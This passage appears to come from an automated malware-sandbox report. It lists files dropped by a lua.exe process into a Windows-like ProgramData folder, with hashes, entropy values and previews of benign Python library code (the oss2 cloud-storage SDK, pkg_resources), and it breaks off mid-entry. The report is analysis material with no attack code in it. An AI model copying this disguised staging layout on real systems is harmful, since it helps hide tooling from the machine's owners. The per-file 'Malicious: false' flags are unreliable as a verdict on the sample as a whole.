Preview:	# -- coding: utf-8 --..import hmac.import hashlib.import time.import logging..from . import utils.from .compat import urlquote, to_bytes...class Auth(object):. """......AccessKeyId.AccessKeySecret...........""".. _subresource_key_set = frozenset(. ['response-content-type', 'response-content-language',. 'response-cache-control', 'logging', 'response-content-encoding',. 'acl', 'uploadId', 'uploads', 'partNumber', 'group', 'link',. 'delete', 'website', 'location', 'objectInfo', 'objectMeta',. 'response-expires', 'response-content-disposition', 'cors', 'lifecycle',. 'restore', 'qos', 'referer', 'append', 'position', 'security-token',. 'live', 'comp', 'status', 'vod', 'startTime', 'endTime', 'x-oss-process']. ).. def __init__(self, access_key_id, access_key_secret):. self.id = access_key_id.strip(). self.secret = access_key_secret.strip().. def _sign_request(self, req, b

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2176
Entropy (8bit):	5.019080736153315
Encrypted:	false
SSDEEP:	48:XPHyZYlspVV0guChDAeO9T1SCsoY7HvlnQyFC7rjsoYw:XPH4SHgueO9UCJGPAzJD
MD5:	CF785AD22A3F13D17FD064ADE110CB82
SHA1:	FE1E4320865BB2CB55D1D254D20069A3B41D41FF
SHA-256:	07719BA65D9CCD4CAEA623D92D5EA73A96A797C3AE20F0622A0C15005459714A
SHA-512:	E37E8F18F06EF5BB81B02EFAA2AF5A5552FF4E5BC4825A178CA5A099260C180A405BFD4A75EF39FA6A386A0ED518A9AD4D8EFDB22E3592C0606245152DDFA533
Malicious:	false
Preview:	# -- coding: utf-8 --.."""...Python..."""..import sys..is_py2 = (sys.version_info[0] == 2).is_py3 = (sys.version_info[0] == 3)...try:. import simplejson as json.except (ImportError, SyntaxError):. import json...if is_py2:. from urllib import quote as urlquote, unquote as urlunquote. from urlparse import urlparse... def to_bytes(data):. """....unicode. ...utf-8...bytes.........""". if isinstance(data, unicode):. return data.encode('utf-8'). else:. return data.. def to_string(data):. """......str..""". return to_bytes(data).. def to_unicode(data):. """......unicode......unicode..utf-8...bytes.""". if isinstance(data, bytes):. return data.decode('utf-8'). else:. return data.. def stringify(input):. if isinstance(input, dict):. return dict([(stringif

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\defaults.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.959303577393942
Encrypted:	false
SSDEEP:	12:icKync6ny7Pl2tPkY/XHF/qccP9rMHeClvrEuMGDb+bwu60gHr4ujYUKBuz:lty7PlSX3F/7cPUlQmb+8+g8SYUKBg
MD5:	5FD21490ED433AF07DA6C5B72685AA8E
SHA1:	11A91A1FF72A36A98AD719CD7E6A94F76A8EBDBC
SHA-256:	39573D42AFB908D2A83D8006E7C525753264021B96C1D2AD9FBEBBFF3B057A5C
SHA-512:	47B6C9A5AC7EC0A10A1EA9370A660B8191835BF1D61AF3027B2EBE620EE958F41398D887F4B4343A63DB7204D4DF2433B44D6F0CDF640C0933920BBA3A7D7A76
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.defaults.~~~~~~~~~~~~~..........."""...def get(value, default_value):. if value is None:. return default_value. else:. return value...#: .......connect_timeout = 60..#: .......request_retries = 3..#: ...............................multipart_threshold = 10 * 1024 * 1024..#: ..........multipart_num_threads = 1..#: .......part_size = 10 * 1024 * 1024...#: ..Session......connection_pool_size = 10...#: .........OSS................multiget..multiget_threshold = 100 * 1024 * 1024..#: .....multiget.......multiget_num_threads = 4..#: .....multiget.........multiget_part_size = 10 * 1024 * 1024

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5800
Entropy (8bit):	5.078863632850258
Encrypted:	false
SSDEEP:	96:iPHfwR4LjtcfErdcV4rOcfErZcAPyzgzn0xzXPQKPZKP6PQJmPZFPwPPxOJOFeOO:6oPyzgzGzXPlPZKP6PQwPzP6PxOJOFeH
MD5:	C1CA9FFD0C8165BAEA68847F23909C26
SHA1:	2B72E8A2463225354FAF5EF91FADA5E0ADFA0145
SHA-256:	C020B244E34FB5717267DDFB78F4C6BB5DB0AC400F925F2E3139E769A403F832
SHA-512:	8D4DF7B78E428F489EA1DBF0114E7897B8DFB195CB384313AE618793116F01BCEBE40B357652B04DABF735AD74052C3CFBA6CFA9424A188BEBA07ECBF011AA4F
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.exceptions.~~~~~~~~~~~~~~......."""..import re..import xml.etree.ElementTree as ElementTree.from xml.parsers import expat...from .compat import to_string..._OSS_ERROR_TO_EXCEPTION = {} # populated at end of module...OSS_CLIENT_ERROR_STATUS = -1.OSS_REQUEST_ERROR_STATUS = -2.OSS_INCONSISTENT_ERROR_STATUS = -3..class OssError(Exception):. def __init__(self, status, headers, body, details):. #: HTTP .... self.status = status.. #: ..ID.......OSS.................ID. self.request_id = headers.get('x-oss-request-id', '').. #: HTTP........ self.body = body.. #: ..........string.string.dict. self.details = details.. #: OSS.... self.code = self.details.get('Code', '').. #: OSS..... self.message = self.details.get('Message', '').. def __str__(self):. e

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\http.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3854
Entropy (8bit):	5.139194982957795
Encrypted:	false
SSDEEP:	48:/KIuWm/v4KmXn8PpepCupepYU7M/B5qCT49wmeMHiYxUKJthqbqzvjRbOweAXFN4:/Tu5/gReOl/B5k6YuUTzvtbOwd4
MD5:	AC2A13A62CC9923119B0A0394EF0FCC4
SHA1:	34D2665D7DEB6A408EBDBC34B5953797096F623C
SHA-256:	19AF1EE68DBC19211AF1520889523276B154BDC590F3C1A076BA33F5091CD5D8
SHA-512:	C90758420FC0BAF43D8D0FED8E3B2A1DF3ECAF3BA663AB9D75F071CFA4E1E51B20EFF77C5099CED720F827CF10B8D195877556D2CFB6DF32590A717F6D939F7D
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.http.~~~~~~~~.........HTTP Adapters...OSS Python SDK....requests...HTTP.................... `Session` . `Request` .`Response` .requests.............."""..import platform..import requests.from requests.structures import CaseInsensitiveDict..from . import __version__, defaults.from .compat import to_bytes.from .exceptions import RequestError.from .utils import file_object_remaining_bytes, SizedFileAdapter..._USER_AGENT = 'aliyun-sdk-python/{0}({1}/{2}/{3};{4})'.format(. __version__, platform.system(), platform.release(), platform.machine(), platform.python_version())...class Session(object):. """.....Session...................HTTP...""". def __init__(self):. self.session = requests.Session().. psize = defaults.connection_pool_size. self.session.mount('http://', requests

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\iterators.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9425
Entropy (8bit):	5.168956908328588
Encrypted:	false
SSDEEP:	96:um1au7kMskqf/03OL2X1JhL9PJp+rXvALGG/A5ZCIjv25goEA:UB0ZJz2XV5BvaEA
MD5:	E437BD063948507E01B31EBE8C71C10E
SHA1:	799AD0272273FEEEC9B30465097F7B494870A560
SHA-256:	8173EFBC5A2F917FF99EE36DE36A4143BF8519F1DDFDEF86A17064EB6CF7524B
SHA-512:	FEAF1DF5535B53F024EB1E528FB02100624FD0AFB5CF8BCF67B9FF467F19A82AA1EA59E54F7328F8D04AE0648573CAF8396D03F5BE661BBB4246E035EC2652EE
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.iterators.~~~~~~~~~~~~~~.........................Bucket..........."""..from .models import MultipartUploadInfo, SimplifiedObjectInfo.from .exceptions import ServerError..from . import defaults...class _BaseIterator(object):. def __init__(self, marker, max_retries):. self.is_truncated = True. self.next_marker = marker.. max_retries = defaults.get(max_retries, defaults.request_retries). self.max_retries = max_retries if max_retries > 0 else 1.. self.entries = [].. def _fetch(self):. raise NotImplemented # pragma: no cover.. def __iter__(self):. return self.. def __next__(self):. while True:. if self.entries:. return self.entries.pop(0).. if not self.is_truncated:. raise StopIteration.. self.fetch_with_retry().. def next(self):. return self.__next__

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\models.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20650
Entropy (8bit):	5.546193963915748
Encrypted:	false
SSDEEP:	384:ySM2Zy5Qg33/9BDYBRPyjt/VEHHR+GvDhMtQme4mw1xuBGVPFVDkxn:PQQI3/9BDYBdyt/VEHH1LSJ1NPFV4V
MD5:	8AB2B8CE678FCFF89867A5C1FE6E447C
SHA1:	73E0A4CA45D9CEE0A7E7BCF6B2471487DA5EB03F
SHA-256:	BE7DB66BAC64432495A46D65F542AA5AA3B860198ACE757C9CA45FE61358F261
SHA-512:	FB2FF11949E70CD9387905D8CF48B1840E22402B2E1090CAC79945F5414AEFBBA5350105FAE3D73E2E200F57DCBB604CBA1B881BB945C4FD3A020DB557F81F1F
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.models.~~~~~~~~~~.......Python SDK API..................."""..from .utils import http_to_unixtime, make_progress_adapter, make_crc_adapter.from .exceptions import ClientError...class PartInfo(object):. """............ ...... :func:`list_parts <oss2.Bucket.list_parts>` ....... :func:`complete_multipart_upload. <oss2.Bucket.complete_multipart_upload>` ...... :param int part_number: .... :param str etag: ...ETag. :param int size: ......... `list_parts` ...... :param int last_modified: ...............int... :ref:`unix_time`. """. def __init__(self, part_number, etag, size=None, last_modified=None):. self.part_number = part_number. self.etag = etag. self.size = size. self.last_modified = last_modified...def _hget(headers, key, con

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\resumable.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25519
Entropy (8bit):	5.1945346573463045
Encrypted:	false
SSDEEP:	192:AkgY71kWe3GdA6JBs3CJ3w1YRmylZLqD9+94V2/+18usQlekRqwBMzzl78id0WEG:xvZz+msjamylto+94P18koZAPcQo
MD5:	C79A98298AFB018F571113E3A15F5667
SHA1:	D06EB44F131072C7B5B1507E866793959C5FF1B8
SHA-256:	9670153E9977023B51F373F4048632E6ED9D92919ECCF4F2C061B4B4929FE458
SHA-512:	9E9226BABFC72BDBA8F201DB0C5AE5E8B07D1CECBB93BD730068E148D4676D5212D4CA566F7FAFA5ED8137DAF92BDB202939FB2917937ED6D5E85A8F1431FF59
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.resumable.~~~~~~~~~~~~~~....................."""..import os..from . import utils.from . import iterators.from . import exceptions.from . import defaults..from .models import PartInfo.from .compat import json, stringify, to_unicode.from .task_queue import TaskQueue...import logging.import functools.import threading.import shutil.import random.import string..._MAX_PART_COUNT = 10000._MIN_PART_SIZE = 100 * 1024...def resumable_upload(bucket, key, filename,. store=None,. headers=None,. multipart_threshold=None,. part_size=None,. progress_callback=None,. num_threads=None):. """........... ......................... `oss2.defaults.multipart_num_threads` ..... ......................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\task_queue.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2274
Entropy (8bit):	4.335932657432885
Encrypted:	false
SSDEEP:	24:lunHwshpA+JLErQmZAirwWwReBWcToqQqsvY+tM40HDgTqDkx2+aQUvNOnLWR:UnQurirwLephQbYoMXyR2+UvsWR
MD5:	1B47FA392FE1B02D3EFA8ED3E56ECFFA
SHA1:	A87662AAB3C601FD5BB6281D6272CB9A5C8B2071
SHA-256:	5078DD62A58A913E1993636048443AF7FD1AA48C1A87CDBBC286D31F97F39F81
SHA-512:	5BF9BB122E798CC618D17B0B524B2022184511C672AEC48B90631C74699F00783A87EC6DF53B37AB31F7E3AB252D883306E012FEA09FBE86B79D3E22B0D6758E
Malicious:	false
Preview:	# -- coding: utf-8 --..import threading.import sys.import logging..try:. import Queue as queue.except ImportError:. import queue..import traceback...class TaskQueue(object):. def __init__(self, producer, consumers):. self.__producer = producer. self.__consumers = consumers.. self.__threads = [].. # must be an infinite queue, otherwise producer may be blocked after all consumers being dead.. self.__queue = queue.Queue().. self.__lock = threading.Lock(). self.__exc_info = None. self.__exc_stack = ''.. def run(self):. self.__add_and_run(threading.Thread(target=self.__producer_func)).. for c in self.__consumers:. self.__add_and_run(threading.Thread(target=self.__consumer_func, args=(c,))).. # give KeyboardInterrupt chances to happen by joining with timeouts.. while self.__any_active():. for t in self.__threads:. t.join(1).. if self.__exc_info:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12951
Entropy (8bit):	5.416396722214392
Encrypted:	false
SSDEEP:	192:YlxbHFSj3BxtW1MIIQkuAH3lUIxw6QI+DrdEVOQSKD+AMAMZ57M1EWrCjUqDW+yM:YlxbHFSj3BxezaxKmStjn7M1ESp7vE
MD5:	B52375B533EF36EF4C80A49236A66CA8
SHA1:	512134C3AE120359DC9FBE1C15765E73092A681B
SHA-256:	C9E776330E185AA356E90B42FEF5732FF1E24542A567F093A08D09FDB1FE65A1
SHA-512:	B810129BD6AD36A22E96CCC69417EB04C1071CDEFFD7A481644935368D4709F552A2291DEA27C4B6B27DD4A63B5AED107047EFB5AE7205ECD1D35948026E51FD
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.utils.----------.........."""..from email.utils import formatdate..import os.path.import mimetypes.import socket.import hashlib.import base64.import threading.import calendar.import datetime.import time.import errno.import crcmod..from .compat import to_string, to_bytes.from .exceptions import ClientError, InconsistentError..._EXTRA_TYPES_MAP = {. ".js": "application/javascript",. ".xlsx": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",. ".xltx": "application/vnd.openxmlformats-officedocument.spreadsheetml.template",. ".potx": "application/vnd.openxmlformats-officedocument.presentationml.template",. ".ppsx": "application/vnd.openxmlformats-officedocument.presentationml.slideshow",. ".pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation",. ".sldx": "application/vnd.openxmlformats-officedocument.presentationml.slide",. ".docx": "application/vnd.openxmlformats-officedo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\xml_utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15630
Entropy (8bit):	4.773559285984086
Encrypted:	false
SSDEEP:	384:VCuTaydeYGOYu1iU6x7Io9yDQpz6iJRIJOJSzvJLJ7JgJmxZJnRJe:VCuTz8YGHqinIkwvqUnDE
MD5:	9B420CCC95AB46C9F6ADDE275D5BAC6F
SHA1:	C238E2C2E13CC297BAE63D4957C36EACA861234E
SHA-256:	896DE6208E6C759C6D3B19E15E655EAFE8E869A58B798E0091244C6CA6C06412
SHA-512:	43B58E5D939458218588651F4E2A6E60F9D3C32500BE8B30D0B88C9AFFBE32939D7274B2EDD2B38830B5E460AD9116DE71107E75DAB13C83AC06C7C88CB56C83
Malicious:	false
Preview:	# -- coding: utf-8 --..""".oss2.xml_utils.~~~~~~~~~~~~~~..XML................. - parse_.................XML. - to_.................XML.."""..import xml.etree.ElementTree as ElementTree..from .models import (SimplifiedObjectInfo,. SimplifiedBucketInfo,. PartInfo,. MultipartUploadInfo,. LifecycleRule,. LifecycleExpiration,. CorsRule,. LiveChannelInfoTarget,. LiveChannelInfo,. LiveRecord,. LiveChannelVideoStat,. LiveChannelAudioStat)..from .compat import urlunquote, to_unicode, to_string.from .utils import iso8601_to_unixtime, date_to_iso8601, iso8601_to_date...def _find_tag(parent, path):. child = parent.find(path). if child is None:. raise RuntimeError("pa

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	107946
Entropy (8bit):	4.496747332589537
Encrypted:	false
SSDEEP:	1536:BVCXhnVawu3wc6Gn1ZmqloYP+sjYeJcE5zPXP+W+iwV/sOz:BVAxQ6GnDlX7PXPk5z
MD5:	55C8198E7E96DB55AB00FB677946111A
SHA1:	2A0466AD071D40D6B93D252554419E42391F8219
SHA-256:	2C44561C78936DACA5BC436EDA592ED0CE33AF3641C05AE77F675B105CC576F7
SHA-512:	E9821FCCB40D94B6B98E9B693950600864E6E08070FFC3ECC5D0D29E1593BDF543FA8DA2398DB00E950BF70AF6319B6FC8B242ED23E73A9880BF6FA95536C75B
Malicious:	false
Preview:	""".Package resource API.--------------------..A resource is a logical file contained within a package, or a logical.subdirectory thereof. The package resource API expects resource names.to have their path parts separated with ``/``, not whatever the local.path separator is. Do not use os.path operations to manipulate resource.names being passed into the API...The package resource API is designed to work with normal filesystem packages,..egg files, and unpacked .egg files. It can also work in a limited way with..zip files and with custom PEP 302 loaders that support the ``get_data()``.method.."""..import sys.import os.import io.import time.import re.import types.import zipfile.import zipimport.import warnings.import stat.import functools.import pkgutil.import operator.import platform.import collections.import plistlib.import email.parser.import errno.import tempfile.import textwrap.import itertools.import inspect.import ntpath.import posixpath.from pkgutil import get_importer..try

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\appdirs.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24701
Entropy (8bit):	4.66575309144007
Encrypted:	false
SSDEEP:	384:PuEi2JUGW2JkEvYIfyk1ZONcJ4P0fl1+yP9HNrYAtovtzfBZ:PuEBYk1D1v95YAtod
MD5:	845B81EC7AB998BD8A74A81D90876921
SHA1:	B2210670FD12E935F2E38EEC166F62E389EE9C8E
SHA-256:	3227AF504BAFDE5FE6408487E52174B210E4FC13611C7CD88803EB4F72133782
SHA-512:	CBFADE70CB495B5F1BE533DA89D6B6D325FDC162456B24B98262D77BEA70188C1A176520BCBB72BD4F96F22C0116D0563E9A8261FBA44134C2C9CA7352053B12
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --.# Copyright (c) 2005-2010 ActiveState Software Inc..# Copyright (c) 2013 Eddy Petri.or.."""Utilities for determining application-specific dirs...See <http://github.com/ActiveState/appdirs> for details and usage..""".# Dev Notes:.# - MSDN on where to store app data files:.# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120.# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html.# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html..__version_info__ = (1, 4, 3).__version__ = '.'.join(map(str, __version_info__))...import sys.import os..PY3 = sys.version_info[0] == 3..if PY3:. unicode = str..if sys.platform.startswith('java'):. import platform. os_name = platform.java_ver()[3][0]. if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc.. system = 'win32'. elif os_name.startswith('Mac'): #

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\__about__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	736
Entropy (8bit):	4.76082264257744
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17KjCy5IRnHt4oJDTFvqvUHC3u/5G/E4ZqQ9590/be2UHVjuEF/M:q9O0ope2PFNz14MHqwhQ95fDR/mBcl2B
MD5:	CB911241AF12A5D8C1B50DCA67A44753
SHA1:	10C90B41A21B9D7AE5DFD7935113AF35AF1E269B
SHA-256:	3CD32C6999F851C087CAE6E044E1F56E5E8296E76E3E3239905AD2A7F660925A
SHA-512:	EBB6E4C06FB81A90C5BB7B8F2E843AAD885B8FBAE16812B3A084D473CACE963AFBA97EDA9B123221CF6B33DB89FE576BC2E79A581E30F969667813FD70CEDF00
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.]..__title__ = "packaging".__summary__ = "Core utilities for Python packages".__uri__ = "https://github.com/pypa/packaging"..__version__ = "20.4"..__author__ = "Donald Stufft and individual contributors".__email__ = "donald@stufft.io"..__license__ = "BSD-2-Clause or Apache-2.0".__copyright__ = "Copyright 2014-2019 %s" % __author__.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	562
Entropy (8bit):	4.355224934892913
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17KjCy5o5SfiJEgF4MNnRnHt4oJDTFvqvUHC3u/D:q9O0ope2p3JFNFNz14MHqK
MD5:	2EED0787819307CC2E25CF45A4A9B5AD
SHA1:	74E5F4A45CF9A2E4E3E1F66456676BC7C49B2FD1
SHA-256:	E9E9DBA795E045F8C18EC23DF9B9F4D078C77F94C7DB53C330E2A4256F31C3EC
SHA-512:	3DBE5D38DFBAFDAE2BD2D0BC621996E3B5B857E714BB2F24264A88D929349255F9332256CE01121B8E19BA9F2ACE51D5DA9DB3898066F43AD2F4975ED2692537
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..from .__about__ import (. __author__,. __copyright__,. __email__,. __license__,. __summary__,. __title__,. __uri__,. __version__,.)..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\_compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1128
Entropy (8bit):	4.823343997423168
Encrypted:	false
SSDEEP:	24:q9O0ope29ny8bGk74hgcTGMfXLAmZOZGjNB2tdJBN2U:IDo8IZKk4hNZOZcQtdJBNv
MD5:	6D5FC01182E0EBBDAA4327FD5CEF0655
SHA1:	8E738F123389098CEBA20249672A339C0015B2D5
SHA-256:	31776C1A9484FD6F99AC7A02F3B6A7748E0B576140C14EC72CBF9E1DEFC28E15
SHA-512:	4C7F2B9C3059D050C5B7EA1617AC499CAD3746C214BCB7BBEBA68A2EF58441DB3CCFCBBBBCA4BDB1DE65CB9E5BB93B7A4AEF7615747E7D0C8802A7614E191811
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import sys..from ._typing import TYPE_CHECKING..if TYPE_CHECKING: # pragma: no cover. from typing import Any, Dict, Tuple, Type...PY2 = sys.version_info[0] == 2.PY3 = sys.version_info[0] == 3..# flake8: noqa..if PY3:. string_types = (str,).else:. string_types = (basestring,)...def with_metaclass(meta, *bases):. # type: (Type[Any], Tuple[Type[Any], ...]) -> Any. """. Create a base class with a metaclass.. """. # This requires a bit of explanation: the basic idea is to make a dummy. # metaclass for one level of class instantiation that replaces itself with. # the actual metaclass.. class metaclass(meta): # type: ignore. def __new__(cls, name, this_bases, d):. # type: (Type[Any], str, Tuple[Any]

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\_structures.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2022
Entropy (8bit):	4.342922127361113
Encrypted:	false
SSDEEP:	48:IDo8V6hdrdljmExXrEVWXrEVo6UjmExXrEVWXrEVedWdv:F32EUNEE
MD5:	2A2F319784450ED303D86E6524053F42
SHA1:	B6B3552024C5BC24DF9F000E34E13B6A37992EE5
SHA-256:	A339025FC43C7F6A84D4489CDD8890E1BB8355F833DA261EBD8F5EED1DB2DE26
SHA-512:	55CA410AA4222751656BA1D5C8B7C1CEF972DB9333F8115CB3CC91FC3CED293AADA426895B96BE81BA4FD1587B7A7AADB8E6A467E50E82D71C423D4226089291
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function...class InfinityType(object):. def __repr__(self):. # type: () -> str. return "Infinity".. def __hash__(self):. # type: () -> int. return hash(repr(self)).. def __lt__(self, other):. # type: (object) -> bool. return False.. def __le__(self, other):. # type: (object) -> bool. return False.. def __eq__(self, other):. # type: (object) -> bool. return isinstance(other, self.__class__).. def __ne__(self, other):. # type: (object) -> bool. return not isinstance(other, self.__class__).. def __gt__(self, other):. # type: (object) -> bool. return True.. def __ge__(self, other):. # type: (object) -> bool. return True..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\_typing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.751869054200876
Encrypted:	false
SSDEEP:	48:xWbqWeWBqxBXoYxtKwXF8opwKjtuvMiqF:y3cr4KkOpgi
MD5:	B0DAC8EF6953FB835C7D633E6A427BA7
SHA1:	F521B39E0501E178412D557AC85D625626B85326
SHA-256:	C79F44850E7B4CC4FE9134722D9576E4766F6061B06EE713A3A88A87F3B4B4CC
SHA-512:	DE5D2189075A26DC2E9BA41C1BBF2D4CCD3D5FB475802A0D7A70E311A301C4C4CB619D9F15C6263A420583B4F8BF87FCD589D6F96FE7B1EDC367B875D54CFDDA
Malicious:	false
Preview:	"""For neatly implementing static typing in packaging...`mypy` - the static type analysis tool we use - uses the `typing` module, which.provides core functionality fundamental to mypy's functioning...Generally, `typing` would be imported at runtime and used in that fashion -.it acts as a no-op at runtime and does not have any run-time overhead by.design...As it turns out, `typing` is not vendorable - it uses separate sources for.Python 2/Python 3. Thus, this codebase can not expect it to be present..To work around this, mypy allows the typing import to be behind a False-y.optional to prevent it from running at runtime and type-comments can be used.to remove the need for the types to be accessible directly during runtime...This module provides the False-y guard in a nicely named fashion so that a.curious maintainer can reach here to read this...In packaging, all static-typing related imports should be guarded as follows:.. from packaging._typing import TYPE_CHECKING.. if TYPE_CHEC

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\markers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9518
Entropy (8bit):	4.816121104833385
Encrypted:	false
SSDEEP:	192:FzOayaMUTfexKz3QgleanMaD/7sEURo6RMAY0w9C:FzOzUTexKz3QyMsAnZRDw9C
MD5:	8F00E9CCDAF4B88878C4EC2685BD6BC7
SHA1:	8938627B8CAFF9D57BAEED28B96733B36278DDE5
SHA-256:	6129ED4243272B2C35FC51BAA1134D9C6C4B2FA6C0C5C1973ADB8513E6134B79
SHA-512:	C84C4E620D2CC22DA61D0599C6BE338F4C6D38C0B65EB833E592CFC936A22CD937AB6EFD7D5B161A82CA9BB06CA1181CFCB8D5DFA757AE98CFECB86C346D5AC8
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import operator.import os.import platform.import sys..from pkg_resources.extern.pyparsing import ParseException, ParseResults, stringStart, stringEnd.from pkg_resources.extern.pyparsing import ZeroOrMore, Group, Forward, QuotedString.from pkg_resources.extern.pyparsing import Literal as L # noqa..from ._compat import string_types.from ._typing import TYPE_CHECKING.from .specifiers import Specifier, InvalidSpecifier..if TYPE_CHECKING: # pragma: no cover. from typing import Any, Callable, Dict, List, Optional, Tuple, Union.. Operator = Callable[[str, str], bool]...__all__ = [. "InvalidMarker",. "UndefinedComparison",. "UndefinedEnvironmentName",. "Marker",. "default_environment",.]...class InvalidMarker(ValueError):. """

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\requirements.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4929
Entropy (8bit):	5.092090121910001
Encrypted:	false
SSDEEP:	96:FB2RgpYRDjkIyzxNxP9TGuHg/U3dNLGNdfPe4zOBIqev0BDuh:FARMacaYLCKIzvKY
MD5:	BA015057B389CB4644134B8FAD43F294
SHA1:	54D9F261C073B73E48C95973D04CB433CCD4D36A
SHA-256:	47C2B81F8C57FE20F82EFA46C35537A2EB8F6C637EC33B05803EDBAE100CEF56
SHA-512:	662F81BFDA98EA450B3D6438459526511295D8A8005D89F5752BE913E1CB910C18CED2A12B8132CA8DD68AC10877FE8EBCDB1993282F617107496B880957E53A
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import string.import re..from pkg_resources.extern.pyparsing import stringStart, stringEnd, originalTextFor, ParseException.from pkg_resources.extern.pyparsing import ZeroOrMore, Word, Optional, Regex, Combine.from pkg_resources.extern.pyparsing import Literal as L # noqa.from urllib import parse as urlparse..from ._typing import TYPE_CHECKING.from .markers import MARKER_EXPR, Marker.from .specifiers import LegacySpecifier, Specifier, SpecifierSet..if TYPE_CHECKING: # pragma: no cover. from typing import List...class InvalidRequirement(ValueError):. """. An invalid requirement was found, users should refer to PEP 508.. """...ALPHANUM = Word(string.ascii_letters + string.digits)..LBRACKET = L("[").suppress().RBRACKET = L("]").suppr

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pkg_resources\_vendor\packaging\specifiers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31944
Entropy (8bit):	4.309184167775029
Encrypted:	false
